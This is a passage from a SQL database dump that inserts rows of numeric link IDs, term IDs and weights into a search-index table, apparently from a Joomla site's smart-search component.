(265, 251005, 1.07331),
(266, 251005, 1.07331),
(265, 251006, 0.91),
(266, 251006, 0.91),
(265, 251007, 1.02669),
(266, 251007, 1.02669),
(265, 251008, 0.95669),
(266, 251008, 0.95669),
(265, 251009, 1.05),
(266, 251009, 1.05),
(265, 251010, 1.14331),
(266, 251010, 1.14331),
(265, 251011, 1.26),
(266, 251011, 1.26),
(265, 251012, 1.19),
(266, 251012, 1.19),
(265, 251013, 0.98),
(266, 251013, 0.98),
(265, 251014, 1.14331),
(266, 251014, 1.14331),
(265, 251015, 1.00331),
(266, 251015, 1.00331),
(265, 251016, 1.23669),
(266, 251016, 1.23669),
(265, 251017, 1.14331),
(266, 251017, 1.14331),
(265, 251018, 1.14331),
(266, 251018, 1.14331),
(265, 251019, 1.09669),
(266, 251019, 1.09669),
(305, 251019, 1.09669),
(265, 251020, 1.12),
(266, 251020, 1.12),
(265, 251021, 1.21331),
(266, 251021, 1.21331),
(265, 251022, 1.05),
(266, 251022, 1.05),
(265, 251023, 1.14331),
(266, 251023, 1.14331),
(265, 251024, 1.19),
(266, 251024, 1.19),
(265, 251025, 1.26),
(266, 251025, 1.26),
(265, 251026, 1.07331),
(266, 251026, 1.07331),
(265, 251027, 1.16669),
(266, 251027, 1.16669),
(265, 251028, 0.42),
(266, 251028, 0.42),
(265, 251029, 0.98),
(266, 251029, 0.98),
(265, 251030, 1.12),
(266, 251030, 1.12),
(265, 251031, 1.07331),
(266, 251031, 1.07331),
(265, 251032, 1.14331),
(266, 251032, 1.14331),
(265, 251033, 1.00331),
(266, 251033, 1.00331),
(265, 251034, 1.21331),
(266, 251034, 1.21331),
(265, 251035, 1.02669),
(266, 251035, 1.02669),
(265, 251036, 1.12),
(266, 251036, 1.12),
(265, 251252, 0.91),
(266, 251252, 0.91),
(265, 251253, 1.02669),
(266, 251253, 1.02669),
(265, 251254, 0.93331),
(266, 251254, 0.93331),
(265, 251255, 1.05),
(266, 251255, 1.05),
(265, 251256, 0.28),
(266, 251256, 0.28),
(265, 251257, 0.95669),
(266, 251257, 0.95669),
(265, 251258, 1.14331),
(266, 251258, 1.14331),
(265, 251259, 0.95669),
(266, 251259, 0.95669),
(265, 251260, 1.14331),
(266, 251260, 1.14331),
(265, 251261, 0.93331),
(266, 251261, 0.93331),
(265, 251262, 1.09669),
(266, 251262, 1.09669),
(265, 251263, 1.00331),
(266, 251263, 1.00331),
(265, 251264, 1.09669),
(266, 251264, 1.09669),
(265, 251265, 1.30669),
(266, 251265, 1.30669),
(265, 251266, 0.28),
(266, 251266, 0.28),
(265, 251267, 0.95669),
(266, 251267, 0.95669),
(265, 251268, 1.07331),
(266, 251268, 1.07331),
(265, 251419, 1.05),
(266, 251419, 1.05),
(265, 251420, 0.98),
(266, 251420, 0.98),
(265, 251421, 0.93331),
(266, 251421, 0.93331),
(265, 251422, 1.02669),
(266, 251422, 1.02669),
(265, 251423, 0.95669),
(266, 251423, 0.95669),
(265, 251424, 1.02669),
(266, 251424, 1.02669),
(265, 251425, 1.21331),
(266, 251425, 1.21331),
(265, 251426, 1.07331),
(266, 251426, 1.07331),
(265, 251427, 1.16669),
(266, 251427, 1.16669),
(265, 251428, 1.19),
(266, 251428, 1.19),
(265, 251429, 1.05),
(266, 251429, 1.05),
(265, 251430, 1.05),
(266, 251430, 1.05),
(265, 251431, 0.88669),
(266, 251431, 0.88669),
(265, 251432, 0.95669),
(266, 251432, 0.95669),
(265, 251433, 1.00331),
(266, 251433, 1.00331),
(305, 251433, 1.00331),
(265, 251434, 1.05),
(266, 251434, 1.05),
(265, 251435, 1.05),
(266, 251435, 1.05),
(265, 251436, 1.16669),
(266, 251436, 1.16669),
(265, 251437, 0.93331),
(266, 251437, 0.93331),
(265, 251438, 1.00331),
(266, 251438, 1.00331),
(265, 251439, 1.07331),
(266, 251439, 1.07331),
(265, 251440, 1.09669),
(266, 251440, 1.09669),
(265, 251441, 1.02669),
(266, 251441, 1.02669),
(265, 251442, 1.12),
(266, 251442, 1.12),
(265, 251443, 1.00331),
(266, 251443, 1.00331),
(265, 251444, 1.09669),
(266, 251444, 1.09669),
(272, 253113, 0.93331),
(280, 253113, 0.93331),
(272, 253114, 0.93331),
(280, 253114, 0.93331),
(272, 253115, 0.98),
(280, 253115, 0.98),
(272, 253116, 0.56),
(280, 253116, 0.56),
(272, 253117, 1.28331),
(280, 253117, 1.28331),
(272, 253118, 1.4),
(280, 253118, 1.4),
(272, 253119, 0.32669),
(280, 253119, 0.32669),
(272, 253120, 1.07331),
(280, 253120, 1.07331),
(272, 253121, 1.16669),
(280, 253121, 1.16669),
(272, 253122, 0.95669),
(280, 253122, 0.95669),
(272, 253123, 0.91),
(280, 253123, 0.91),
(272, 253124, 1.02669),
(280, 253124, 1.02669),
(272, 253125, 0.23331),
(280, 253125, 0.23331),
(272, 253126, 1.14331),
(280, 253126, 1.14331),
(272, 253127, 1.30669),
(280, 253127, 1.30669),
(272, 253128, 1.23669),
(280, 253128, 1.23669),
(272, 253129, 0.23331),
(280, 253129, 0.23331),
(272, 253130, 1.09669),
(280, 253130, 1.09669),
(272, 253131, 1.33),
(280, 253131, 1.33),
(272, 253132, 1.14331),
(280, 253132, 1.14331),
(272, 253133, 0.93331),
(280, 253133, 0.93331),
(272, 253134, 1.07331),
(280, 253134, 1.07331),
(272, 253135, 1.02669),
(280, 253135, 1.02669),
(272, 253136, 1.12),
(280, 253136, 1.12),
(272, 253137, 0.91),
(280, 253137, 0.91),
(272, 253138, 1.00331),
(280, 253138, 1.00331),
(272, 253139, 0.93331),
(280, 253139, 0.93331),
(272, 253140, 1.02669),
(280, 253140, 1.02669),
(272, 253141, 0.37331),
(280, 253141, 0.37331),
(272, 253142, 0.95669),
(280, 253142, 0.95669),
(272, 253143, 1.28331),
(280, 253143, 1.28331),
(272, 253144, 0.46669),
(280, 253144, 0.46669),
(272, 253145, 1.05),
(280, 253145, 1.05),
(272, 253146, 1.16669),
(280, 253146, 1.16669),
(272, 253147, 0.37331),
(280, 253147, 0.37331),
(272, 253148, 1.00331),
(280, 253148, 1.00331),
(272, 253149, 1.19),
(280, 253149, 1.19),
(272, 253150, 0.37331),
(280, 253150, 0.37331),
(272, 253151, 0.98),
(280, 253151, 0.98),
(272, 253152, 1.16669),
(280, 253152, 1.16669),
(272, 253153, 1.14331),
(280, 253153, 1.14331),
(272, 253154, 1.16669),
(280, 253154, 1.16669),
(272, 253516, 1.07331),
(280, 253516, 1.07331),
(272, 253517, 1.07331),
(280, 253517, 1.07331),
(272, 253518, 1.19),
(280, 253518, 1.19),
(272, 253519, 0.88669),
(280, 253519, 0.88669),
(272, 253520, 0.98),
(280, 253520, 0.98),
(272, 253521, 1.16669),
(280, 253521, 1.16669),
(272, 253522, 0.37331),
(280, 253522, 0.37331),
(272, 253523, 1.12),
(280, 253523, 1.12),
(272, 253525, 1.02669),
(280, 253525, 1.02669),
(272, 253526, 1.12),
(280, 253526, 1.12),
(272, 253527, 1.12),
(280, 253527, 1.12),
(272, 253528, 1.21331),
(280, 253528, 1.21331),
(272, 253529, 1.35331),
(280, 253529, 1.35331),
(272, 253530, 1.07331),
(280, 253530, 1.07331),
(272, 253531, 1.14331),
(280, 253531, 1.14331),
(272, 253532, 0.98),
(280, 253532, 0.98),
(272, 253533, 1.07331),
(280, 253533, 1.07331),
(272, 253534, 0.95669),
(280, 253534, 0.95669),
(272, 253535, 1.05),
(280, 253535, 1.05),
(272, 253536, 0.28),
(280, 253536, 0.28),
(272, 253537, 0.93331),
(280, 253537, 0.93331),
(272, 253538, 1.07331),
(280, 253538, 1.07331),
(272, 253539, 0.95669),
(280, 253539, 0.95669),
(272, 253540, 1.07331),
(280, 253540, 1.07331),
(272, 253667, 0.93331),
(280, 253667, 0.93331),
(272, 253668, 1.00331),
(280, 253668, 1.00331),
(272, 253669, 0.98),
(280, 253669, 0.98),
(272, 253670, 1.05),
(280, 253670, 1.05),
(272, 253671, 1.02669),
(280, 253671, 1.02669),
(272, 253672, 0.95669),
(280, 253672, 0.95669),
(272, 253673, 1.19),
(280, 253673, 1.19),
(272, 253674, 1.09669),
(280, 253674, 1.09669),
(272, 253675, 0.98),
(280, 253675, 0.98),
(272, 253676, 0.93331),
(280, 253676, 0.93331),
(272, 253677, 1.07331),
(280, 253677, 1.07331),
(272, 253678, 0.91),
(280, 253678, 0.91),
(272, 253679, 1.02669),
(280, 253679, 1.02669),
(272, 253680, 0.93331),
(280, 253680, 0.93331),
(272, 253681, 1.02669),
(280, 253681, 1.02669),
(272, 253682, 1.05),
(280, 253682, 1.05),
(272, 253683, 0.95669),
(280, 253683, 0.95669),
(272, 253684, 1.07331),
(280, 253684, 1.07331),
(272, 253685, 0.93331),
(280, 253685, 0.93331),
(272, 253686, 1.02669),
(280, 253686, 1.02669),
(272, 253687, 0.98),
(280, 253687, 0.98),
(272, 253688, 1.12),
(280, 253688, 1.12),
(272, 253689, 1.14331),
(280, 253689, 1.14331),
(272, 253690, 1.09669),
(280, 253690, 1.09669),
(272, 253691, 1.02669),
(280, 253691, 1.02669),
(272, 253692, 1.21331),
(280, 253692, 1.21331),
(272, 253693, 1.09669),
(280, 253693, 1.09669),
(272, 253694, 0.91),
(280, 253694, 0.91),
(272, 253695, 1.00331),
(280, 253695, 1.00331),
(272, 253696, 1.09669),
(280, 253696, 1.09669),
(272, 253697, 1.16669),
(280, 253697, 1.16669),
(272, 253698, 1.00331),
(280, 253698, 1.00331),
(272, 253699, 1.16669),
(280, 253699, 1.16669),
(272, 253700, 0.88669),
(280, 253700, 0.88669),
(272, 253701, 1.00331),
(280, 253701, 1.00331),
(273, 256149, 0.91),
(273, 256150, 1.00331),
(273, 256151, 0.86331),
(273, 256152, 0.95669),
(273, 256153, 0.95669),
(273, 256154, 0.91),
(305, 256154, 0.91),
(273, 256155, 1.07331),
(273, 256156, 0.18669),
(273, 256157, 0.88669),
(273, 256158, 0.93331),
(273, 256159, 1.02669),
(273, 256160, 1.12),
(273, 256161, 0.88669),
(273, 256162, 1.12),
(273, 256163, 0.93331),
(274, 256163, 0.93331),
(273, 256164, 1.05),
(274, 256164, 1.05),
(273, 256165, 0.86331),
(273, 256166, 1.00331),
(273, 256167, 1.65323),
(273, 256168, 4.34),
(273, 256169, 4.65),
(273, 256170, 0.98),
(273, 256171, 1.07331),
(273, 256172, 0.86331),
(273, 256173, 0.98),
(273, 256420, 0.98),
(273, 256421, 1.07331),
(273, 256422, 0.93331),
(273, 256423, 1.02669),
(273, 256424, 1.12),
(273, 256425, 0.93331),
(273, 256426, 1.07331),
(273, 256427, 0.91),
(273, 256428, 1.00331),
(274, 256429, 0.86331),
(273, 256429, 1.72662),
(273, 256430, 1.09669),
(274, 256430, 1.09669),
(273, 256431, 0.95669),
(273, 256591, 0.95669),
(273, 256592, 0.91),
(273, 256593, 0.98),
(273, 256594, 1.16669),
(273, 256595, 0.93331),
(273, 256596, 1.19),
(273, 256597, 1.00331),
(273, 256598, 0.98),
(273, 256599, 1.07331),
(273, 256600, 0.95669),
(273, 256601, 1.14331),
(273, 256602, 1.00331),
(273, 256603, 0.95669),
(273, 256604, 4.85677),
(273, 256605, 0.95669),
(273, 256606, 1.02669),
(273, 256607, 0.98),
(273, 256608, 1.02669),
(274, 260680, 1.12),
(275, 260680, 1.12),
(280, 260680, 1.12),
(288, 264552, 0.32669),
(299, 264552, 0.32669),
(233, 266357, 2.3334),
(233, 266358, 2.5334),
(233, 266428, 1.05),
(233, 266429, 1.12),
(233, 266430, 1.07331),
(233, 266431, 1.00331),
(233, 266432, 1.05),
(233, 266433, 0.95669),
(233, 266434, 1.02669),
(233, 266435, 0.91),
(233, 266436, 1.00331),
(233, 266437, 0.98),
(233, 266438, 1.07331),
(233, 266439, 0.46669),
(233, 266440, 1.07331),
(233, 266441, 1.23669),
(233, 266442, 1.00331),
(233, 266443, 0.84),
(233, 266444, 0.91),
(233, 266445, 0.81669),
(233, 266446, 0.88669),
(233, 266631, 0.91),
(233, 266632, 0.98),
(233, 266633, 7.98),
(233, 266634, 9.12),
(233, 266635, 1.07331),
(233, 266698, 0.88669),
(233, 266699, 1.02669),
(233, 266700, 0.37331),
(233, 266701, 1.09669),
(233, 266702, 1.16669),
(233, 266703, 0.88669),
(233, 266704, 0.95669),
(233, 266705, 1.05),
(233, 266706, 0.95669),
(233, 266707, 1.00331),
(233, 266708, 0.93331),
(233, 266709, 0.86331),
(233, 266710, 0.95669),
(233, 266711, 1.19),
(233, 266712, 1.02669),
(233, 266713, 1.12),
(233, 266714, 1.07331),
(233, 266715, 1.05),
(235, 267382, 0.28),
(235, 267383, 0.91),
(235, 267384, 0.98),
(235, 267481, 0.42),
(235, 267482, 1.05),
(235, 267483, 1.30669),
(235, 267484, 0.28),
(235, 267485, 1.07331),
(235, 267486, 1.30669),
(235, 267487, 1.09669),
(235, 267488, 1.16669),
(235, 267489, 0.95669),
(235, 267490, 1.21331),
(235, 267491, 1.00331),
(235, 267492, 1.05),
(235, 267493, 5.0668),
(235, 267494, 6),
(235, 267495, 1.07331),
(235, 267496, 1.21331),
(235, 267497, 0.95669),
(235, 267498, 1.02669),
(235, 267499, 0.95669),
(235, 267500, 1.02669),
(235, 267501, 1.07331),
(235, 267502, 2.55),
(235, 267503, 2.94661),
(235, 267504, 1.07331),
(235, 267505, 0.93331),
(235, 267506, 1.09669),
(235, 267507, 1.82),
(235, 267508, 1.07331),
(235, 267509, 1.05),
(235, 267510, 1.02669),
(235, 267511, 0.98),
(235, 267512, 1.05),
(235, 267513, 0.93331),
(235, 267514, 1.05),
(235, 267515, 0.37331),
(235, 267516, 1.09669),
(235, 267517, 1.28331),
(235, 267518, 0.95669),
(235, 267519, 0.32669),
(235, 267520, 1.19),
(235, 267521, 1.23669),
(235, 267522, 0.28),
(235, 267523, 0.98),
(235, 267524, 1.09669),
(235, 267525, 0.98),
(235, 267526, 1.12),
(235, 267527, 5.74014),
(235, 267528, 1.02669),
(235, 267529, 4.2),
(235, 267530, 0.91),
(235, 267531, 1.05),
(235, 267532, 0.95669),
(235, 267533, 1.07331),
(235, 267534, 1.07331),
(235, 267535, 1.00331),
(235, 267536, 0.91),
(235, 267537, 1.00331),
(235, 267538, 0.56),
(235, 267539, 1.05),
(235, 267540, 1.19),
(235, 267541, 1.02669),
(235, 267542, 1.12),
(292, 267543, 0.60669),
(235, 267543, 1.21338),
(235, 267544, 1.14331),
(235, 267545, 1.23669),
(235, 267546, 1.12),
(235, 267547, 1.21331),
(235, 267548, 0.46669),
(235, 267549, 1.05),
(235, 267550, 1.19),
(235, 267551, 0.95669),
(235, 267924, 0.95669),
(235, 267925, 1.05),
(235, 267926, 0.51331),
(235, 267927, 1.09669),
(235, 267928, 1.23669),
(235, 267929, 0.88669),
(235, 267930, 1.00331),
(235, 267931, 0.93331),
(235, 267932, 1.05),
(235, 267933, 0.93331),
(235, 267934, 1.02669),
(235, 267935, 1.05),
(235, 267936, 0.32669),
(235, 267937, 0.93331),
(235, 267938, 1.02669),
(235, 267939, 0.95669),
(235, 267940, 1.09669),
(235, 267941, 0.81669),
(235, 267942, 0.91),
(235, 267943, 1.16669),
(235, 267944, 1.23669),
(235, 267945, 1.02669),
(235, 268162, 1.02669),
(235, 268163, 1.02669),
(235, 268164, 1.05),
(235, 268165, 1.16669),
(235, 268166, 1.02669),
(235, 268167, 0.93331),
(235, 268168, 1.05),
(235, 268169, 0.98),
(235, 268170, 1.14331),
(235, 268171, 1.00331),
(235, 268172, 1.07331),
(236, 268504, 0.91),
(236, 268505, 1.02669),
(236, 268506, 1.09669),
(236, 268613, 0.95669),
(236, 268614, 1.05),
(236, 268615, 0.93331),
(292, 268615, 0.93331),
(236, 268616, 0.93331),
(236, 268617, 0.98),
(236, 268618, 0.37331),
(236, 268619, 0.95669),
(236, 268620, 1.02669),
(236, 268621, 0.91),
(236, 268622, 1.12),
(236, 268623, 0.32669),
(236, 268624, 0.93331),
(236, 268625, 1.05),
(236, 268626, 0.93331),
(236, 268627, 1.00331),
(236, 268628, 1.00331),
(236, 268629, 1.12),
(236, 268630, 1.12),
(236, 268631, 0.91),
(236, 268632, 1.00331),
(236, 268633, 0.93331),
(236, 268634, 0.98),
(236, 268635, 1.00331),
(287, 268635, 1.00331),
(236, 268636, 1.02669),
(236, 268637, 1.09669),
(236, 268638, 1.05),
(236, 268639, 1.09669),
(236, 268640, 1.02669),
(236, 268641, 1.16669),
(236, 268642, 0.95669),
(236, 268643, 1.12),
(236, 268644, 0.28),
(236, 268645, 0.91),
(236, 268646, 1.02669),
(236, 268647, 1.05),
(236, 268648, 0.37331),
(236, 268649, 1.00331),
(236, 268650, 1.26),
(236, 268651, 0.37331),
(236, 268652, 1.00331),
(236, 268653, 1.09669),
(236, 268654, 1.07331),
(236, 268655, 1.16669),
(236, 268656, 1.09669),
(236, 268657, 1.16669),
(236, 268658, 0.37331),
(236, 268659, 0.98),
(236, 268660, 1.07331),
(236, 268661, 0.84),
(236, 268662, 0.98),
(236, 268663, 0.81669),
(236, 268664, 0.88669),
(236, 268665, 1.07331),
(236, 268666, 0.56),
(236, 268667, 1.23669),
(236, 268668, 1.4),
(236, 268669, 0.32669),
(236, 268670, 1.02669),
(236, 268671, 1.09669),
(236, 269050, 0.95669),
(236, 269051, 1.09669),
(236, 269052, 0.93331),
(236, 269053, 0.98),
(236, 269054, 1.05),
(236, 269055, 1.16669),
(236, 269056, 1.09669),
(236, 269057, 1.00331),
(236, 269058, 1.19),
(236, 269059, 1.07331),
(236, 269060, 1.19),
(236, 269061, 1.00331),
(236, 269062, 1.26),
(236, 269063, 0.98),
(236, 269064, 1.05),
(236, 269065, 0.98),
(236, 269066, 1.09669),
(236, 269067, 3.26676),
(236, 269068, 0.95669),
(236, 269069, 0.95669),
(236, 269070, 0.91),
(236, 269071, 0.86331),
(236, 269072, 0.95669),
(243, 269072, 0.95669),
(236, 269073, 0.46662),
(236, 269074, 0.91),
(236, 269075, 1.02669),
(236, 269076, 0.95669),
(236, 269077, 1.07331),
(236, 269078, 0.23331),
(236, 269079, 0.95669),
(236, 269080, 1.07331),
(236, 269081, 1.02669),
(236, 269082, 1.09669),
(236, 269083, 1.02669),
(236, 269084, 1.14331),
(236, 269315, 1.02669),
(236, 269316, 1.16669),
(236, 269317, 1.00331),
(236, 269318, 1.09669),
(236, 269319, 0.98),
(236, 269320, 2.38),
(236, 269321, 2.60661),
(236, 269322, 1.19),
(236, 269323, 1.05),
(236, 269324, 1.02669),
(236, 269325, 0.98),
(236, 269326, 1.05),
(237, 269517, 0.88669),
(237, 269518, 0.95669),
(237, 269519, 1.05),
(237, 269520, 0.91),
(237, 269521, 1.00331),
(237, 269522, 0.91),
(237, 269523, 1.05),
(237, 269524, 0.42),
(237, 269525, 0.98),
(237, 269526, 1.12),
(237, 269527, 1.07331),
(237, 269528, 0.95669),
(237, 269529, 1.12),
(237, 269530, 0.32669),
(237, 269531, 0.93331),
(237, 269532, 1.02669),
(237, 269533, 0.91),
(237, 269534, 0.98),
(237, 269535, 0.98),
(237, 269536, 1.23669),
(237, 269537, 0.93331),
(237, 269538, 1.02669),
(237, 269539, 1.07331),
(237, 269540, 1.16669),
(237, 269541, 1.02669),
(237, 269542, 1.09669),
(237, 269543, 1.07331),
(237, 269544, 1.16669),
(237, 269545, 1.07331),
(237, 269546, 1.16669),
(237, 269547, 1.14331),
(237, 269548, 1.23669),
(237, 269549, 1.00331),
(237, 269550, 1.09669),
(237, 269551, 0.88669),
(237, 269552, 0.98),
(237, 269553, 1.82),
(237, 269554, 1.00331),
(237, 269555, 1.05),
(237, 269556, 0.95669),
(237, 269557, 1.02669),
(237, 269558, 0.91),
(237, 269559, 1.05),
(237, 269757, 0.42),
(237, 269758, 0.98),
(237, 269759, 1.07331),
(237, 269760, 1.91338),
(237, 269761, 2.19338),
(237, 269762, 0.42),
(237, 269763, 1.12),
(237, 269764, 1.37669),
(237, 269765, 1.00331),
(237, 269766, 1.09669),
(237, 269767, 1.07331),
(237, 269768, 1.16669),
(237, 269910, 0.84),
(237, 269911, 0.93331),
(237, 269912, 1.00331),
(237, 269913, 1.12),
(237, 269914, 1.02669),
(237, 269915, 1.05);
INSERT INTO `y57u5_finder_links_terms4` (`link_id`, `term_id`, `weight`) VALUES
(237, 269916, 0.95669),
(237, 269917, 0.93331),
(237, 269918, 1.05),
(237, 269919, 0.93331),
(237, 269920, 1.00331),
(237, 269921, 0.95669),
(237, 269922, 1.02669),
(237, 269923, 1.00331),
(237, 269924, 0.88669),
(237, 269925, 1.00331),
(237, 269926, 0.88669),
(237, 269927, 0.95669),
(237, 269928, 0.23331),
(306, 269928, 0.23331),
(237, 269929, 0.91),
(237, 269930, 1.00331),
(237, 269931, 0.95669),
(237, 269932, 1.07331),
(237, 269933, 1.05),
(237, 269934, 1.14331),
(237, 269935, 1.09669),
(237, 269936, 0.98),
(237, 269937, 1.09669),
(237, 269938, 0.98),
(237, 269939, 2.28662),
(238, 270703, 1.91338),
(238, 270704, 1.05),
(238, 270705, 1.05),
(238, 270706, 0.93331),
(238, 270707, 1.09669),
(238, 270708, 1.00331),
(238, 270709, 0.91),
(238, 270710, 1.00331),
(238, 270711, 0.98),
(238, 270712, 0.86331),
(238, 270713, 1.02669),
(238, 270714, 0.95669),
(238, 270715, 1.07331),
(238, 270716, 0.86331),
(238, 270717, 1.00331),
(238, 270718, 1.02669),
(238, 270719, 0.28),
(238, 270720, 0.93331),
(238, 270721, 1.09669),
(238, 270722, 0.88669),
(238, 270723, 0.95669),
(238, 270724, 1.07331),
(238, 270725, 1.21331),
(238, 270726, 0.14),
(238, 270727, 0.84),
(238, 270728, 0.91),
(238, 270729, 0.98),
(238, 270730, 1.05),
(238, 270731, 9.12),
(238, 270732, 1.16669),
(238, 270733, 1.02669),
(238, 270734, 1.21331),
(238, 270735, 1.00331),
(238, 270736, 1.14331),
(238, 270737, 1.16669),
(238, 270738, 1.00331),
(238, 270739, 1.09669),
(238, 270740, 0.98),
(238, 270741, 0.95669),
(238, 270742, 1.05),
(238, 270743, 0.93331),
(238, 270744, 1.02669),
(238, 270745, 1.05),
(238, 270746, 1.21331),
(238, 270747, 0.42),
(238, 270748, 0.98),
(238, 270749, 1.09669),
(238, 270750, 0.32669),
(238, 270751, 1.07331),
(238, 270752, 1.19),
(238, 270753, 0.32669),
(238, 270754, 0.93331),
(238, 270755, 1.02669),
(238, 270756, 0.42),
(306, 270756, 0.42),
(238, 270757, 1.05),
(238, 270758, 1.14331),
(238, 270759, 0.56),
(238, 270760, 1.05),
(238, 270761, 1.19),
(238, 270762, 0.56),
(238, 270763, 1.07331),
(238, 270764, 1.19),
(238, 270765, 0.91),
(238, 270766, 1.02669),
(238, 270767, 0.86331),
(238, 270768, 0.95669),
(238, 271273, 0.28),
(238, 271274, 0.91),
(238, 271275, 1.02669),
(238, 271276, 0.32669),
(238, 271277, 0.95669),
(238, 271278, 1.05),
(238, 271279, 0.98),
(238, 271280, 1.07331),
(238, 271281, 0.46669),
(238, 271282, 1.09669),
(238, 271283, 1.19),
(238, 271284, 0.37331),
(238, 271285, 1.00331),
(238, 271286, 1.09669),
(238, 271287, 0.51331),
(238, 271288, 1.16669),
(238, 271289, 1.26),
(238, 271290, 1.05),
(238, 271291, 1.16669),
(238, 271292, 0.91),
(238, 271293, 1.02669),
(238, 271294, 0.91),
(238, 271295, 1.09669),
(238, 271296, 0.95669),
(238, 271297, 1.02669),
(238, 271298, 0.98),
(238, 271299, 1.16669),
(238, 271300, 0.98),
(238, 271301, 1.05),
(238, 271302, 0.95669),
(238, 271303, 1.12),
(238, 271304, 1.16669),
(238, 271305, 1.26),
(238, 271306, 1.02669),
(238, 271307, 1.12),
(238, 271308, 0.98),
(238, 271309, 1.07331),
(238, 271310, 0.98),
(238, 271311, 1.12),
(238, 271312, 1.07331),
(238, 271313, 1.28331),
(238, 271599, 0.98),
(238, 271600, 1.05),
(238, 271601, 0.95669),
(238, 271602, 1.16669),
(238, 271603, 1.05),
(238, 271604, 0.95669),
(238, 271605, 0.91),
(238, 271606, 1.00331),
(238, 271607, 0.98),
(238, 271608, 1.12),
(238, 271609, 0.88669),
(238, 271610, 0.98),
(238, 271611, 1.12),
(238, 271612, 0.98),
(238, 271613, 1.23669),
(238, 271614, 1.02669),
(238, 271615, 1.07331),
(238, 271616, 0.23331),
(238, 271617, 0.86331),
(238, 271618, 1.02669),
(238, 271619, 0.88669),
(238, 271620, 1.00331),
(238, 271621, 1.00331),
(238, 271622, 1.14331),
(238, 271623, 1.86662),
(238, 271624, 1.12),
(238, 271625, 1.02669),
(238, 271626, 0.98),
(238, 271627, 1.16669),
(238, 271628, 1.19),
(239, 272485, 0.95669),
(239, 272701, 1.19),
(239, 272702, 1.12),
(239, 272703, 1.16669),
(239, 272704, 0.95669),
(239, 272705, 1.05),
(239, 272706, 1.19),
(239, 272707, 0.91),
(239, 272708, 1.02669),
(239, 272709, 0.95669),
(239, 272710, 1.02669),
(239, 272711, 0.98),
(239, 272712, 1.09669),
(239, 272713, 0.91),
(239, 272714, 1.00331),
(239, 272715, 0.88669),
(239, 272716, 0.98),
(239, 272717, 1.77338),
(239, 272718, 2.1),
(239, 272719, 0.91),
(239, 272720, 1.00331),
(239, 272721, 0.93331),
(239, 272722, 1.07331),
(239, 272723, 0.93331),
(239, 272724, 1.07331),
(239, 272725, 0.93331),
(239, 272726, 1.02669),
(239, 272727, 1.09669),
(239, 272728, 1.16669),
(239, 272729, 1.05),
(239, 272730, 1.09669),
(239, 272731, 1.21331),
(239, 272732, 1.09669),
(239, 272733, 1.33),
(239, 272734, 1.12),
(239, 272735, 1.19),
(239, 272736, 1.05),
(239, 272737, 1.09669),
(239, 272738, 1.23669),
(239, 272739, 1.12),
(239, 272740, 1.21331),
(239, 272741, 1.05),
(239, 272742, 1.12),
(239, 272743, 2.42662),
(239, 272744, 1.07331),
(239, 272745, 1.14331),
(239, 272746, 1.05),
(239, 272747, 1.21331),
(239, 272748, 2.00662),
(239, 272749, 1.09669),
(239, 272750, 1.12),
(239, 272751, 1.12),
(239, 272752, 1.12),
(239, 272753, 0.98),
(239, 272754, 1.16669),
(239, 272755, 1.02669),
(239, 272756, 1.23669),
(239, 272757, 1.07331),
(239, 272758, 0.93331),
(239, 272759, 1.00331),
(239, 272760, 1.05),
(239, 272761, 1.19),
(239, 272762, 0.32669),
(239, 272763, 0.93331),
(239, 272764, 1.00331),
(239, 272765, 1.14331),
(239, 272766, 1.21331),
(239, 272767, 0.95669),
(239, 272768, 1.05),
(239, 272769, 0.88669),
(239, 272770, 0.98),
(239, 272771, 0.86331),
(239, 272772, 0.95669),
(239, 272773, 1.02669),
(239, 272774, 0.51331),
(306, 272774, 0.51331),
(239, 272775, 1.09669),
(239, 272776, 1.26),
(239, 272777, 1.12),
(239, 272778, 1.19),
(239, 272779, 1.05),
(239, 272780, 1.14331),
(239, 272781, 1.19),
(239, 272782, 1.33),
(239, 272783, 1.02669),
(239, 272784, 1.28331),
(239, 272785, 0.42),
(239, 272786, 1.00331),
(239, 272787, 1.16669),
(239, 272788, 0.37331),
(239, 272789, 0.98),
(239, 272790, 1.19),
(239, 272791, 1.09669),
(239, 272792, 1.21331),
(239, 272793, 1.16669),
(239, 272794, 0.60669),
(239, 272795, 1.07331),
(239, 272796, 1.16669),
(239, 272797, 1.02669),
(239, 272798, 1.16669),
(239, 272799, 1.00331),
(239, 272800, 1.07331),
(239, 272801, 0.28),
(239, 272802, 0.93331),
(239, 272803, 1.14331),
(239, 273398, 0.32669),
(239, 273399, 0.95669),
(239, 273400, 1.09669),
(239, 273401, 0.95669),
(239, 273402, 1.05),
(239, 273403, 0.93331),
(306, 273403, 0.93331),
(239, 273404, 1.05),
(239, 273405, 0.32669),
(305, 273405, 0.32669),
(239, 273406, 1.00331),
(239, 273407, 1.09669),
(239, 273408, 1.05),
(239, 273409, 1.21331),
(239, 273410, 1.33),
(239, 273411, 0.7),
(239, 273412, 1.12),
(239, 273413, 1.21331),
(239, 273414, 0.56),
(239, 273415, 1.09669),
(239, 273416, 1.19),
(239, 273417, 1.00331),
(306, 273417, 1.00331),
(239, 273418, 1.14331),
(239, 273419, 1.19),
(239, 273420, 1.33),
(239, 273421, 0.46669),
(292, 273421, 0.46669),
(239, 273422, 0.98),
(239, 273423, 1.12),
(239, 273424, 1.00331),
(239, 273425, 0.28),
(239, 273426, 1.16669),
(239, 273427, 1.23669),
(239, 273428, 1.02669),
(239, 273429, 0.98),
(239, 273829, 0.95669),
(239, 273830, 1.07331),
(239, 273831, 1.12),
(239, 273832, 0.91),
(239, 273833, 1.09669),
(239, 273834, 0.95669),
(239, 273835, 1.05),
(239, 273836, 1.00331),
(239, 273837, 1.07331),
(305, 273837, 1.07331),
(239, 273838, 2.05338),
(239, 273839, 1.12),
(239, 273840, 1.19),
(239, 273841, 1.00331),
(239, 273842, 0.98),
(239, 273843, 1.05),
(239, 273844, 0.93331),
(239, 273845, 1.07331),
(239, 273846, 0.98),
(239, 273847, 1.05),
(239, 273848, 1.00331),
(239, 273849, 1.05),
(239, 273850, 1.05),
(239, 273851, 1.16669),
(239, 273852, 1.07331),
(239, 273853, 0.37331),
(239, 273854, 1.14331),
(239, 273855, 1.21331),
(239, 273856, 1.00331),
(240, 274801, 0.98),
(240, 274802, 1.00331),
(306, 274802, 1.00331),
(240, 274803, 0.93331),
(240, 274804, 0.98),
(240, 274805, 0.91),
(240, 274806, 0.95669),
(240, 274807, 0.98),
(240, 274808, 1.14331),
(240, 274809, 0.86331),
(240, 274810, 0.95669),
(240, 274811, 0.95669),
(240, 274812, 1.07331),
(240, 274813, 1.12),
(240, 274814, 1.21331),
(240, 274815, 1.12),
(240, 274816, 1.28331),
